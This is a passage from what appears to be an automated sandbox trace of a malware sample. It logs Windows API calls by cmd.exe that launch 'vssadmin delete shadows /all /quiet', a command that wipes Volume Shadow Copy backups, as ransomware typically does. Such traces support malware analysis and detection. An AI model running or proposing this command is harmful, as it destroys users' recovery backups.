cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x1a1eb0 [0113.364] FindClose (in: hFindFile=0x1a1eb0 | out: hFindFile=0x1a1eb0) returned 1 [0113.364] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0113.364] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x38f76c | out: lpFindFileData=0x38f76c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9a83100, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xc9a83100, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x1a1eb0 [0113.364] FindClose (in: hFindFile=0x1a1eb0 | out: hFindFile=0x1a1eb0) returned 1 [0113.364] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0113.365] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0113.365] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0113.365] GetProcessHeap () returned 0x190000 [0113.365] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a4ba8 | out: hHeap=0x190000) returned 1 [0113.365] GetEnvironmentStringsW () returned 0x1a40b8* [0113.365] GetProcessHeap () returned 0x190000 [0113.365] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xb36) returned 0x1a56f8 [0113.365] FreeEnvironmentStringsW (penv=0x1a40b8) returned 1 [0113.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.365] GetProcessHeap () returned 0x190000 [0113.365] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a5698 | out: hHeap=0x190000) returned 1 [0113.365] GetProcessHeap () returned 0x190000 [0113.365] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x400e) returned 0x1a6238 [0113.366] GetProcessHeap () returned 0x190000 [0113.366] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x5c) returned 0x1a2d88 [0113.366] GetProcessHeap () returned 0x190000 [0113.366] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a6238 | out: hHeap=0x190000) returned 1 [0113.366] GetConsoleOutputCP () returned 0x1b5 [0113.367] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0113.367] GetUserDefaultLCID () returned 0x409 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x38fb30, cchData=128 | out: lpLCData="0") returned 2 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x38fb30, cchData=128 | out: lpLCData="0") returned 2 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x38fb30, cchData=128 | out: lpLCData="1") returned 2 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0113.368] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0113.369] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0113.370] GetProcessHeap () returned 0x190000 [0113.370] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x20c) returned 0x1a2df0 [0113.370] GetConsoleTitleW (in: lpConsoleTitle=0x1a2df0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.372] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0113.372] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0113.372] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0113.373] GetProcessHeap () returned 0x190000 [0113.373] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x400a) returned 0x1a6238 [0113.373] GetProcessHeap () returned 0x190000 [0113.373] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a6238 | out: hHeap=0x190000) returned 1 [0113.374] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0113.374] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0113.374] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0113.374] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0113.374] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0113.375] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0113.375] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0113.375] GetProcessHeap () returned 0x190000 [0113.375] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x58) returned 0x1a3008 [0113.375] GetProcessHeap () returned 0x190000 [0113.375] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x22) returned 0x1a3068 [0113.376] GetProcessHeap () returned 0x190000 [0113.376] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x40) returned 0x1a3098 [0113.376] GetConsoleTitleW (in: lpConsoleTitle=0x38f828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.380] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0113.380] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0113.380] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0113.380] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0113.380] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0113.380] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0113.380] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0113.380] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0113.380] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0113.380] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0113.380] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0113.380] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0113.380] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0113.380] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0113.380] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0113.381] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0113.381] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0113.381] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0113.381] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0113.381] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0113.381] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0113.381] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0113.381] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0113.381] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0113.381] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0113.381] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0113.381] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0113.381] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0113.381] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0113.381] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0113.381] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0113.381] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0113.381] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0113.381] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0113.381] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0113.381] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0113.381] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0113.381] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0113.381] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0113.381] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0113.381] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0113.381] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0113.382] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0113.382] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0113.382] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0113.382] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0113.382] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0113.382] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0113.382] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0113.382] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0113.382] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0113.382] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0113.382] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0113.382] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0113.382] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0113.382] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0113.382] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0113.382] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0113.382] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0113.382] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0113.382] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0113.382] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0113.382] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0113.382] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0113.382] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0113.382] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0113.382] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0113.382] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0113.382] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0113.382] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0113.382] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0113.383] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0113.383] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0113.383] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0113.383] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0113.383] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0113.383] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0113.383] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0113.383] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0113.383] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0113.383] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0113.383] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0113.383] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0113.383] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0113.383] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0113.383] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0113.383] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0113.383] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0113.384] GetProcessHeap () returned 0x190000 [0113.384] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x210) returned 0x1a30e0 [0113.384] GetProcessHeap () returned 0x190000 [0113.384] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x5a) returned 0x1a32f8 [0113.384] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0113.384] GetProcessHeap () returned 0x190000 [0113.384] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x418) returned 0x1907f0 [0113.385] SetErrorMode (uMode=0x0) returned 0x0 [0113.385] SetErrorMode (uMode=0x1) returned 0x0 [0113.385] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1907f8, lpFilePart=0x38f348 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38f348*="Desktop") returned 0x25 [0113.385] SetErrorMode (uMode=0x0) returned 0x1 [0113.385] GetProcessHeap () returned 0x190000 [0113.385] RtlReAllocateHeap (Heap=0x190000, Flags=0x0, Ptr=0x1907f0, Size=0x6e) returned 0x1907f0 [0113.385] GetProcessHeap () returned 0x190000 [0113.385] RtlSizeHeap (HeapHandle=0x190000, Flags=0x0, MemoryPointer=0x1907f0) returned 0x6e [0113.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0113.385] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0113.385] GetProcessHeap () returned 0x190000 [0113.385] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x120) returned 0x1a3360 [0113.385] GetProcessHeap () returned 0x190000 [0113.385] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x238) returned 0x190868 [0113.394] RtlReAllocateHeap (Heap=0x190000, Flags=0x0, Ptr=0x190868, Size=0x122) returned 0x190868 [0113.394] GetProcessHeap () returned 0x190000 [0113.394] RtlSizeHeap (HeapHandle=0x190000, Flags=0x0, MemoryPointer=0x190868) returned 0x122 [0113.394] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.394] GetProcessHeap () returned 0x190000 [0113.394] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xe0) returned 0x1a3488 [0113.394] RtlReAllocateHeap (Heap=0x190000, Flags=0x0, Ptr=0x1a3488, Size=0x76) returned 0x1a3488 [0113.394] GetProcessHeap () returned 0x190000 [0113.394] RtlSizeHeap (HeapHandle=0x190000, Flags=0x0, MemoryPointer=0x1a3488) returned 0x76 [0113.415] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.415] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x38f0e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38f0e4) returned 0xffffffff [0113.415] GetLastError () returned 0x2 [0113.415] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x38f0c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38f0c4) returned 0xffffffff [0113.415] GetLastError () returned 0x2 [0113.415] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x38f0c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38f0c4) returned 0xffffffff [0113.416] GetLastError () returned 0x2 [0113.416] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.416] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x38f0e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38f0e4) returned 0x1a3508 [0113.416] GetProcessHeap () returned 0x190000 [0113.416] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x0, Size=0x14) returned 0x1a3548 [0113.416] FindClose (in: hFindFile=0x1a3508 | out: hFindFile=0x1a3508) returned 1 [0113.416] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0113.416] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0113.416] GetConsoleTitleW (in: lpConsoleTitle=0x38f5bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.416] InitializeProcThreadAttributeList (in: lpAttributeList=0x38f444, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x38f50c | out: lpAttributeList=0x38f444, lpSize=0x38f50c) returned 1 [0113.416] UpdateProcThreadAttribute (in: lpAttributeList=0x38f444, dwFlags=0x0, Attribute=0x60001, lpValue=0x38f504, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x38f444, lpPreviousValue=0x0) returned 1 [0113.417] GetStartupInfoW (in: lpStartupInfo=0x38f400 | out: lpStartupInfo=0x38f400*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x45c, hStdError=0x0)) [0113.417] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0113.418] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x38f4a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38f4ec | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x38f4ec*(hProcess=0x78, hThread=0x74, dwProcessId=0x6c8, dwThreadId=0x314)) returned 1 [0113.592] CloseHandle (hObject=0x74) returned 1 [0113.593] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0113.593] GetProcessHeap () returned 0x190000 [0113.593] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a56f8 | out: hHeap=0x190000) returned 1 [0113.593] GetEnvironmentStringsW () returned 0x1a40b8* [0113.593] GetProcessHeap () returned 0x190000 [0113.593] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xb36) returned 0x1a4bf8 [0113.593] FreeEnvironmentStringsW (penv=0x1a40b8) returned 1 [0113.593] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0116.469] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x38f3e0 | out: lpExitCode=0x38f3e0*=0x2) returned 1 [0116.469] CloseHandle (hObject=0x78) returned 1 [0116.470] _vsnwprintf (in: _Buffer=0x38f528, _BufferCount=0x13, _Format="%08X", _ArgList=0x38f3ec | out: _Buffer="00000002") returned 8 [0116.470] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0116.470] GetProcessHeap () returned 0x190000 [0116.470] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a4bf8 | out: hHeap=0x190000) returned 1 [0116.470] GetEnvironmentStringsW () returned 0x1a40b8* [0116.470] GetProcessHeap () returned 0x190000 [0116.470] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xb5c) returned 0x1a4c20 [0116.470] FreeEnvironmentStringsW (penv=0x1a40b8) returned 1 [0116.470] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.470] GetProcessHeap () returned 0x190000 [0116.470] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a4c20 | out: hHeap=0x190000) returned 1 [0116.470] GetEnvironmentStringsW () returned 0x1a40b8* [0116.470] GetProcessHeap () returned 0x190000 [0116.470] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xb5c) returned 0x1a4c20 [0116.470] FreeEnvironmentStringsW (penv=0x1a40b8) returned 1 [0116.470] GetProcessHeap () returned 0x190000 [0116.470] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x19f700 | out: hHeap=0x190000) returned 1 [0116.470] DeleteProcThreadAttributeList (in: lpAttributeList=0x38f444 | out: lpAttributeList=0x38f444) [0116.470] _get_osfhandle (_FileHandle=1) returned 0x45c [0116.471] SetConsoleMode (hConsoleHandle=0x45c, dwMode=0x0) returned 0 [0116.471] _get_osfhandle (_FileHandle=1) returned 0x45c [0116.471] GetConsoleMode (in: hConsoleHandle=0x45c, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 0 [0116.471] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0116.471] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0116.471] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0116.471] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0116.472] SetConsoleInputExeNameW () returned 0x1 [0116.472] GetConsoleOutputCP () returned 0x1b5 [0116.472] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0116.472] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.472] exit (_Code=2) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x338ab000" os_pid = "0xbb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xba0" cmd_line = "\"cmd\" /C vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0xbbc [0112.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7b0 | out: lpSystemTimeAsFileTime=0x2ef7b0*(dwLowDateTime=0xf26c8820, dwHighDateTime=0x1d6a20a)) [0112.965] GetCurrentProcessId () returned 0xbb4 [0112.965] GetCurrentThreadId () returned 0xbbc [0112.965] GetTickCount () returned 0x1151c19 [0112.965] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7b8 | out: lpPerformanceCount=0x2ef7b8*=23301915464) returned 1 [0112.968] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab90000 [0112.968] __set_app_type (_Type=0x1) [0112.968] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4abb7810) returned 0x0 [0112.968] __getmainargs (in: _Argc=0x4abda608, _Argv=0x4abda618, _Env=0x4abda610, _DoWildCard=0, _StartInfo=0x4abbe0f4 | out: _Argc=0x4abda608, _Argv=0x4abda618, _Env=0x4abda610) returned 0 [0112.968] GetCurrentThreadId () returned 0xbbc [0112.968] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbbc) returned 0x3c [0112.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0112.969] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0112.969] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0112.969] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0112.969] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef748 | out: phkResult=0x2ef748*=0x0) returned 0x2 [0112.970] VirtualQuery (in: lpAddress=0x2ef730, lpBuffer=0x2ef6b0, dwLength=0x30 | out: lpBuffer=0x2ef6b0*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0112.970] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef6b0, dwLength=0x30 | out: lpBuffer=0x2ef6b0*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0112.970] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef6b0, dwLength=0x30 | out: lpBuffer=0x2ef6b0*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0112.970] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2ef6b0, dwLength=0x30 | out: lpBuffer=0x2ef6b0*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0112.970] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef6b0, dwLength=0x30 | out: lpBuffer=0x2ef6b0*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0112.970] GetConsoleOutputCP () returned 0x1b5 [0112.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abcbfe0 | out: lpCPInfo=0x4abcbfe0) returned 1 [0112.970] SetConsoleCtrlHandler (HandlerRoutine=0x4abb3184, Add=1) returned 1 [0112.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.970] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0112.971] _get_osfhandle (_FileHandle=1) returned 0x7 